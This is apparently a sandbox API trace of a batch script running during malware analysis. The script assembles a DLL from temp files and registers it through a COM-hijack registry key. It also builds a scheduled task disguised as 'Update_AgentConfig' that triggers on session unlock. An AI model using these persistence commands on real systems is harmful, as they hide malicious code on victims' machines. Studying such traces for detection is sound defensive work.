[0375.687] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="SETLOCAL\r\n", cbMultiByte=10, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="SETLOCAL\r\n 4D5A50 \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP\"") returned 10
[0375.687] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.687] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3d
[0375.687] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.687] GetFileType (hFile=0x5c) returned 0x1
[0375.688] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3d
[0375.688] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.688] SetFilePointer (in: hFile=0x5c, lDistanceToMove=119, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x77
[0375.688] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="MD %LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\r\n", cbMultiByte=58, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="MD %LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\r\nM.TMP\"") returned 58
[0375.688] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.688] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x77
[0375.688] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.688] GetFileType (hFile=0x5c) returned 0x1
[0375.688] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x77
[0375.689] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.689] SetFilePointer (in: hFile=0x5c, lDistanceToMove=228, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe4
[0375.689] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="COPY /B \"%TEMP%\\MMM.TMP\"+\"%TEMP%\\TTT.TMP\" %LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL \r\n", cbMultiByte=109, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="COPY /B \"%TEMP%\\MMM.TMP\"+\"%TEMP%\\TTT.TMP\" %LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL \r\n") returned 109
[0375.689] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.689] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe4
[0375.689] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.689] GetFileType (hFile=0x5c) returned 0x1
[0375.689] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe4
[0375.689] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.690] SetFilePointer (in: hFile=0x5c, lDistanceToMove=416, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0
[0375.690] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="reg add HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{A78ED123-AB77-406B-9999-2A5D9D2F7FB7}\\InprocServer32\\ /t REG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n", cbMultiByte=188, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="reg add HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{A78ED123-AB77-406B-9999-2A5D9D2F7FB7}\\InprocServer32\\ /t REG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 188
[0375.690] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.690] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0
[0375.690] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.690] GetFileType (hFile=0x5c) returned 0x1
[0375.690] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0
[0375.690] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.690] SetFilePointer (in: hFile=0x5c, lDistanceToMove=481, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e1
[0375.690] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ > %temp%\\a.xml\r\n", cbMultiByte=65, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ > %temp%\\a.xml\r\n06B-9999-2A5D9D2F7FB7}\\InprocServer32\\ /t REG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 65
[0375.691] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.691] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e1
[0375.691] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.692] GetFileType (hFile=0x5c) returned 0x1
[0375.692] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e1
[0375.692] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.693] SetFilePointer (in: hFile=0x5c, lDistanceToMove=590, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x24e
[0375.693] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=109, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 109
[0375.693] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.693] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x24e
[0375.693] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.693] GetFileType (hFile=0x5c) returned 0x1
[0375.693] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x24e
[0375.693] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.693] SetFilePointer (in: hFile=0x5c, lDistanceToMove=633, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x279
[0375.694] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=43, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nchemas.microsoft.com/windows/2004/02/mit/task\"^> >> %temp%\\a.xml\r\n") returned 43
[0375.694] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.694] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x279
[0375.694] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.694] GetFileType (hFile=0x5c) returned 0x1
[0375.694] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x279
[0375.694] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.694] SetFilePointer (in: hFile=0x5c, lDistanceToMove=701, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd
[0375.694] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^2020-06-18T10:13:32.9293139^ >> %temp%\\a.xml\r\n", cbMultiByte=68, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^2020-06-18T10:13:32.9293139^ >> %temp%\\a.xml\r\nows/2004/02/mit/task\"^> >> %temp%\\a.xml\r\n") returned 68
[0375.695] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.695] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd
[0375.695] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.695] GetFileType (hFile=0x5c) returned 0x1
[0375.695] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd
[0375.695] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.695] SetFilePointer (in: hFile=0x5c, lDistanceToMove=771, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x303
[0375.696] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^Update Agent Cfg^ >> %temp%\\a.xml\r\n", cbMultiByte=70, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^Update Agent Cfg^ >> %temp%\\a.xml\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\n") returned 70
[0375.696] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.696] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x303
[0375.696] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.696] GetFileType (hFile=0x5c) returned 0x1
[0375.696] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x303
[0375.696] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.696] SetFilePointer (in: hFile=0x5c, lDistanceToMove=828, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x33c
[0375.696] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^\\Update_AgentConfig^ >> %temp%\\a.xml\r\n", cbMultiByte=57, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^\\Update_AgentConfig^ >> %temp%\\a.xml\r\ntemp%\\a.xml\r\n") returned 57
[0375.696] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.697] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x33c
[0375.697] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.697] GetFileType (hFile=0x5c) returned 0x1
[0375.697] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x33c
[0375.697] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.697] SetFilePointer (in: hFile=0x5c, lDistanceToMove=872, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x368
[0375.697] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=44, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\ntemp%\\a.xml\r\n") returned 44
[0375.697] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.697] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x368
[0375.698] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.698] GetFileType (hFile=0x5c) returned 0x1
[0375.698] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x368
[0375.698] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.698] SetFilePointer (in: hFile=0x5c, lDistanceToMove=907, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x38b
[0375.698] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=35, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n%\\a.xml\r\n") returned 35
[0375.698] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.698] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x38b
[0375.698] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.698] GetFileType (hFile=0x5c) returned 0x1
[0375.698] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x38b
[0375.699] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.699] SetFilePointer (in: hFile=0x5c, lDistanceToMove=946, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3b2
[0375.699] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=39, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nxml\r\n") returned 39
[0375.699] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.699] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3b2
[0375.699] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.699] GetFileType (hFile=0x5c) returned 0x1
[0375.699] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3b2
[0375.700] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.700] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3e8
[0375.700] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^%USERNAME%^ >> %temp%\\a.xml\r\n", cbMultiByte=54, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^%USERNAME%^ >> %temp%\\a.xml\r\nl\r\n") returned 54
[0375.700] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.700] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3e8
[0375.700] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.700] GetFileType (hFile=0x5c) returned 0x1
[0375.700] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3e8
[0375.700] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.701] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1041, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x411
[0375.701] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml \r\n", cbMultiByte=41, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml \r\ntemp%\\a.xml\r\n") returned 41
[0375.701] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.701] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x411
[0375.701] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.701] GetFileType (hFile=0x5c) returned 0x1
[0375.701] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x411
[0375.701] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.701] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1090, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x442
[0375.701] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml \r\n", cbMultiByte=49, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml \r\nxml\r\n") returned 49
[0375.702] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.702] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x442
[0375.702] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.702] GetFileType (hFile=0x5c) returned 0x1
[0375.702] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x442
[0375.702] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.702] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x477
[0375.702] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml \r\n", cbMultiByte=53, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml \r\n\n") returned 53
[0375.702] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.703] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x477
[0375.703] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.703] GetFileType (hFile=0x5c) returned 0x1
[0375.703] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x477
[0375.703] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.703] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1194, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4aa
[0375.703] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^true^ >> %temp%\\a.xml \r\n", cbMultiByte=51, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^true^ >> %temp%\\a.xml \r\n\r\n") returned 51
[0375.703] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.703] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4aa
[0375.704] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.704] GetFileType (hFile=0x5c) returned 0x1
[0375.704] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4aa
[0375.704] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.704] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1262, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ee
[0375.704] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^SessionUnlock^ >> %temp%\\a.xml \r\n", cbMultiByte=68, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^SessionUnlock^ >> %temp%\\a.xml \r\n\r\n") returned 68
[0375.704] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.704] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ee
[0375.704] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.704] GetFileType (hFile=0x5c) returned 0x1
[0375.705] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ee
[0375.705] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.705] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1316, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x524
[0375.705] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^%USERNAME%^ >> %temp%\\a.xml\r\n", cbMultiByte=54, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^%USERNAME%^ >> %temp%\\a.xml\r\ntemp%\\a.xml \r\n") returned 54
[0375.705] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.705] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x524
[0375.705] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.705] GetFileType (hFile=0x5c) returned 0x1
[0375.705] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x524
[0375.706] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.706] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1369, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x559
[0375.706] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=53, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n\n") returned 53
[0375.706] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.706] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x559
[0375.706] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.706] GetFileType (hFile=0x5c) returned 0x1
[0375.706] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x559
